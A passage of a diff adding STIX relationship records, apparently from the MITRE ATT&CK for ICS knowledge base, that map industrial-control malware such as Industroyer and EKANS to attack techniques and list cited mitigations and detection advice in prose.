"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ffdee1a-1e83-4506-aba2-38c55812abb3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.137Z", + "relationship_type": "mitigates", + "description": "Ensure that all SIS are segmented from operational networks to prevent them from being targeted by additional adversarial behavior.\n", + "source_ref": "course-of-action--da44255d-85c5-492c-baf3-ee823d44f848", + "target_ref": "attack-pattern--5fa00fdd-4a55-4191-94a0-564181d7fec2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7c3b65e8-e8b7-4c3b-b27b-e216986d8976", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:26:34.069Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) toggles breakers to the open state utilizing unauthorized command messages. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6833d534-9cbb-4b9f-85b6-93d3d2d6faca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.202Z", + "relationship_type": "mitigates", + "description": "Ensure proper process and file permissions are in place to inhibit adversaries from disabling or interfering with critical services.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--46bc86e4-e20b-4778-80d2-8891039e6fb4", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Hydro", + "description": "Hydro Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 Retrieved. 2019/10/16 ", + "url": "https://www.hydro.com/en/media/on-the-agenda/cyber-attack/" + }, + { + "source_name": "Kevin Beaumont", + "description": "Kevin Beaumont How Lockergoga took down Hydro ransomware used in targeted attacks aimed at big business Retrieved. 2019/10/16 ", + "url": "https://doublepulsar.com/how-lockergoga-took-down-hydro-ransomware-used-in-targeted-attacks-aimed-at-big-business-c666551f5880" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:56:30.836Z", + "description": "While Norsk Hydro attempted to recover from a [LockerGoga](https://attack.mitre.org/software/S0372) infection, most of its 160 manufacturing locations switched to manual (non-IT driven) operations. Manual operations can result in a loss of productivity. (Citation: Kevin Beaumont)(Citation: Hydro)", + "relationship_type": "uses", + "source_ref": "malware--5af7a825-2d9f-400d-931a-e00eb9e27f48", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--a08d85dd-a8b3-4848-94aa-941c43b6d8f2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.069Z", + "relationship_type": "mitigates", + "description": "Prevent unauthorized systems from accessing control servers or field devices containing industrial information, especially services used for common automation protocols (e.g., DNP3, OPC).\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--87eb5825-c918-444f-8da5-67da9eea9906", + "created": "2022-09-26T17:14:52.427Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:14:52.427Z", + "description": "Monitor device application logs for firmware changes, although not all devices will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8fa6fe89-e704-4be4-a15b-50e188084aa3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.120Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--85a45294-08f1-4539-bf00-7da08aa7b0ee", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at Pwn2Own hacking contest Retrieved. 2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--75a60046-c4d7-498a-b256-9a93b5992dcc", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:46.014Z", + "description": "Monitor for unusual processes with internal network connections creating files on-system which may be suspicious. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c5fd0969-c151-4849-94c2-83e2e208cff7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.168Z", + "relationship_type": "mitigates", + "description": "Ensure that wired and/or wireless traffic is encrypted when feasible. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5ae1cf3a-2603-4bf9-ace3-5b1ee5d8d757", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.180Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict program uploads to only certain users (e.g., engineers, field technician), preferably through implementing a role-based access mechanism.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--5d4f6aff-650c-45fe-a9d8-2080d3ea02d7", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:48:51.528Z", + "description": "Authenticate connections fromsoftware and devices to prevent unauthorized systems from accessing protected management functions.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b3b24837-83ed-46c5-ba80-66a832c7072e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.062Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--19a71d1e-6334-4233-8260-b749cae37953", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--dc35c44a-a90c-48a1-8811-af2618216e42", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:45:08.648Z", + "description": "Use strong multi-factor authentication for remote service accounts to mitigate an adversary's ability to leverage stolen credentials. Be aware of multi-factor authentication interception techniques for some implementations.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e0aee02c-b424-4781-be10-793d71594c31", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:23:47.107Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) RAT is distributed through a trojanized installer attached to emails. (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--71e9230d-eec8-4ce1-bc96-9288bacc8b13", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:44:01.639Z", + "description": "To protect against AiTM, authentication mechanisms should not send credentials across the network in plaintext and should also implement mechanisms to prevent replay attacks (such as nonces or timestamps). Challenge-response based authentication techniques that do not directly send credentials over the network provide better protection from AiTM.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--72e46e53-e12d-4106-9c70-33241b6ed549", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7ca9443-f833-4636-9c30-fcaddd3516c6", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:33:22.909Z", + "description": "Monitor for changes made to Windows registry keys and/or values that may stop or disable services on a system to render those services unavailable to legitimate users.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--567acebd-4ba2-4723-a74d-514992321ccc", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:03:27.702Z", + "description": "Monitor for lack of operational process data which may help identify a loss of communications. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0ff88ef7-44fd-4307-b381-2e0bc76ce83b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.209Z", + "relationship_type": "mitigates", + "description": "Ensure proper network segmentation between higher level corporate resources and the control process environment.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--11e4eb54-b0b3-4f67-a93f-28cc10df00ab", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + }, + { + "source_name": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020", + "description": "Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly 2020, July 15 Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT Retrieved. 2021/04/12 ", + "url": "https://www.fireeye.com/blog/threat-research/2020/02/ransomware-against-machine-learning-to-disrupt-industrial-production.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:45:28.094Z", + "description": "Before encrypting the process, [EKANS](https://attack.mitre.org/software/S0605) first kills the process if its name matches one of the processes defined on the kill-list. (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) (Citation: Daniel Kapellmann Zafra, Keith Lunden, Nathan Brubaker, Jeremy Kennelly July 2020) EKANS also utilizes netsh commands to implement firewall rules that blocks any remote communication with the device. (Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--90d9c8e3-0250-4096-8d98-7ca1d324d654", + "created": "2021-04-12T10:12:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:22:33.586Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload has the capability of enumerating OPC tags, in addition to more generic OPC server information. The server data and tag names can provide information about the names and function of control devices. (Citation: ICS-CERT August 2018) (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c2f82ff-bde7-4ab8-b6ab-35d7f7f498dd", + "created": "2022-09-27T15:27:00.387Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:27:00.387Z", + "description": "Networking devices such as switches may log when new client devices connect (e.g., SNMP notifications). Monitor for any logs documenting changes to network connection status to determine when a new connection has occurred, including the resulting addresses (e.g., IP, MAC) of devices on that network.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--35392fb4-a31d-4c6a-b9f2-1c65b7f5e6b9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a6519c11-e9d4-4b6f-8d92-8efaa2144c28", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Davey Winder June 2020", + "description": "Davey Winder 2020, June 10 Honda Hacked: Japanese Car Giant Confirms Cyber Attack On Global Operations Retrieved. 2021/04/12 ", + "url": "https://www.forbes.com/sites/daveywinder/2020/06/10/honda-hacked-japanese-car-giant-confirms-cyber-attack-on-global-operations-snake-ransomware/?sh=2725c35753ad" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:47:16.775Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) infection resulted in a temporary production loss within a Honda manufacturing plant. (Citation: Davey Winder June 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c2fe42b4-6750-4b51-86b7-6c37fbfdef2d", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Department of Homeland Security October 2009", + "description": "Department of Homeland Security 2009, October Developing an Industrial Control Systems Cybersecurity Incident Response Capability Retrieved. 2020/09/17 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/final-RP_ics_cybersecurity_incident_response_100609.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-19T21:23:21.586Z", + "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. Maintain and exercise incident response plans (Citation: Department of Homeland Security October 2009), including the management of gold-copy back-up images and configurations for key systems to enable quick recovery and response from adversarial activities that impact control, view, or availability.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad12819e-3211-4291-b360-069f280cff0a", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--973f5884-a076-413e-ac96-f0bd01375fb6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T11:15:26.506Z", + "modified": "2022-05-06T17:47:24.153Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--09a61657-46e1-439e-b3ed-3e4556a78243", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--966b59c0-8641-432c-84f7-b2a712004d74", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:52:41.680Z", + "description": "The [Industroyer](https://attack.mitre.org/software/S0604) IEC 104 module has 3 modes available to perform its attack. These modes are range, shift, and sequence. The range mode operates in 2 stages. The first stage of range mode gathers Information Object Addresses (IOA) and sends select and execute packets to switch the state. The second stage of range mode has an infinite loop where it will switch the state of all of the previously discovered IOAs. Shift mode is similar to range mode, but instead of staying within the same range, it will add a shift value to the default range values. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--1dc35f79-0ada-4342-bd13-10d10c1b0335", + "created": "2021-04-13T12:28:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Ben Hunter and Fred Gutierrez July 2020", + "description": "Ben Hunter and Fred Gutierrez 2020, July 01 EKANS Ransomware Targeting OT ICS Systems Retrieved. 2021/04/12 ", + "url": "https://www.fortinet.com/blog/threat-research/ekans-ransomware-targeting-ot-ics-systems" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:46:56.223Z", + "description": "[EKANS](https://attack.mitre.org/software/S0605) performs a DNS lookup of an internal domain name associated with its target network to identify if it was deployed on the intended system. (Citation: Ben Hunter and Fred Gutierrez July 2020)", + "relationship_type": "uses", + "source_ref": "malware--00e7d565-9883-4ee5-b642-8fd17fd6a3f5", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--375b7e67-8b3f-4102-9e3e-7e356b6c8bf4", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:43:54.996Z", + "description": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Web Application Firewalls may detect improper inputs attempting exploitation.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 